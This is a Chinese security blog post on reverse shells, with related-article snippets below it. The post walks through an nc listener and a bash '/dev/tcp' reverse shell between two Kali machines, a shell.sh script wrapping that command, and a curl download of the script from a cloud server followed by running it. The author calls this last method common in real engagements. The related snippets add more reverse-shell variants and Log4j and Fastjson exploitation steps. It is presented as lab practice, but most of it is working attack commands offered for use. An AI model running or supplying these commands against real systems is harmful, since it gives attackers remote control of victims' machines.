【web安全】反弹shell 靶场测试+实战

已于 2023-12-20 18:27:05 修改
阅读量535 收藏 10
点赞数 6
分类专栏: web安全 文章标签: 网络
于 2023-11-22 15:27:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46301214/article/details/134554004
版权

这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看

目录

知识点1:靶机测试 - 双kali

知识点2:靶机测试 - 双kali - 脚本反弹

知识点3:云服务器反弹(实战常用)

踩坑点1:需要局域网内才稳定

踩坑点2:端口没开放

知识点1:靶机测试 - 双kali

踩坑点:局域网内才稳定

// 第一台kali
nc -lvvp 7777  # 开启监听

// 第二台kali
bash -c "bash -i >& /dev/tcp/192.168.118.129/7777 0>&1"  # 反弹shell

知识点2:靶机测试 - 双kali - 脚本反弹

// 新建一个 shell.sh 的可执行文件
bash -c "bash -i >& /dev/tcp/192.168.118.129/7777 0>&1"

// 然后执行这个 shell.sh 文件即可反弹shell
bash shell.sh

知识点3:云服务器反弹(实战常用)

实战之中先探测是否能连接外网,那么就顺便把shell反弹文件下载

// 下载反弹shell文件
curl -o shell.sh http://43.136.101.245:81/shell.sh

然后在云服务器开启监听

// 虚拟机kali执行反弹shell文件
bash shell.sh

这里有个大坑,请看踩坑点2

踩坑点1:需要局域网内才稳定

记得开启局域网

NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了

踩坑点2:端口没开放

云服务器永远反弹不成功,云服务器的安全组也全部开放了,但是还是失败

后来才想起,宝塔也有这个功能,要记得去开放一下

星盾网安
关注
专栏目录
log4j2核弹级漏洞靶场复现(反弹shell
m0_56773673的博客
01-04 4145
十分钟log4j2靶场漏洞复现!!!
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 9063
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
反弹shell常见方法总结
qq_45746681的博客
10-08 840
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1370
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
反弹shell
litiammmm的博客
07-29 874
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
靶场分享反弹shell
2301_81475812的博客
05-03 201
1、存在反弹shell命令的java代码文件Exploit.java,通过版本为1.8的jdk工具进行编译,生成Exploit.class文件 2、在存在Exploit.class文件的目录下开启http服务,让开启ldap服务端的工具marshalsec-0.0.3-SNAPSHOT-all.jar来访问这个文件 3、使用工具marshalsec-0.0.3-SNAPSHOT-all.jar开启ldap服务端,并访问Exploit.class文件 4、使用POC来连接ldap服务器端的访问
反弹shell&数据不回显带外查询&pikaqiu靶场搭建
fencecat的博客
03-04 1316
解决无图形化:当我们想下载一个文件时,通常是通过浏览器的一个链接直接访问网站点击下载的,但是在实际的安全测试中,我们获取的权限只是一个执行命令的窗口,无法获取图形化界面,因此,我们就需要命令来实现文件的上传和下载。比如,当我们想上传一个文件到对方的服务器,我们应该想办法用命令让对方执行下载操作,而不可能直接打开对方的服务器的浏览器去下载,因为我们没有获取这样的权限,只能通过黑窗窗输入命令尝试。Windows->| & || &&Linux->; | || & && ``(特有``和;)
[网鼎杯 2020 朱雀组]phpweb-反弹shell
YkingH的博客
03-10 5453
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXIyF4mu-1646878901483)(D:\Blog\做题题解[网鼎杯 2020 朱雀组]phpweb\image-2022030920444
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8065
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权
z2560088的博客
09-26 755
扫描靶机Ip根据靶机Mac确定靶机ip地址为 nmap -sP 192.168.160.0/24 或 netdiscover -r 192.168.160.0/24 确定ip地址为192.168.160.141 nmap 192.168.160.141 -sV -p- -A 发现80端口,和开源内容管理系统 joomla 连接http://192.168.160.141 joomscan --url http://192.168.160.141 发现joomla...
网络安全】2022年第一次靶场渗透实战学习
HBohan的博客
01-17 4204
渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术;主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统。
web渗透常见shell反弹姿势
RuoLi_s的博客
11-28 837
常见反弹shell总结: 一、bash反弹 通用 ① 在kali机里面开启端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 ③ 解释 bash -i: 打开一个交互的bash .>&: 标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port : 意为调
反弹shell与提权】
一纸荒芜的博客
08-01 2231
网安面试常见问题
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1899
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
HTB_Pennyworth 靶机之命令&代码执行与反弹shell
网络安全学习
05-29 1049
本次通过分析 jenkins 组件学习渗透测试流程,最终通过代码执行漏洞拿到 shell 信息收集 日常扫描,nmap -sV -v ,发现开放 8080 端口 Jenkins是一个独立的开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能 持续集成:简单来说,有时候做项目,各个模块单独测试时都是能用的,但是上线前将所有模块集成到一起之后跑不通了,此时修改就为时晚矣,所以在模块开发时,就尽早将模块整合,持续不断的集成新模.
windows反弹主机_反弹shell的N种姿势
weixin_28907247的博客
01-31 916
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev...
渗透测试-pikachu反弹shell-拿下服务器
weixin_68243135的博客
08-13 641
pikachu反弹shell
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9839
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
反弹shell(未完待续)
weixin_52116519的博客
10-22 1194
反弹shell亲手去测试总会遇到各种问题,这个问题也可能是玄学问题,那就重启咯。找解决方法时要注意加上系统及其版本,比如docker的安装在Ubuntu不同版本是不太一样的。为了防止入门劝退,最好找个跟自己一样系统版本的解决教程。先动手按照教程去实验一遍,不懂原理可以稍后去了解,不要因为不会就永远停在一个地方。最近看到的两句话(1)学习的本质是模仿。不会走先学爬,照葫芦画瓢,慢慢积累实战经验。(2)掌握一门学科所用的时间越短,学习质量就越高,对知识的理解也越深。
渗透测试必备:反弹shell手法详解与实战技巧
反弹shell在渗透测试网络安全中扮演着至关重要的角色,它允许攻击者在目标系统上获取交互式shell,突破防火墙限制,进行更深入的操作和权限提升。本文档提供了一套详细的反弹shell技巧,适用于不同操作系统环境下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星盾网安

能花钱买到的知识,都不贵

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值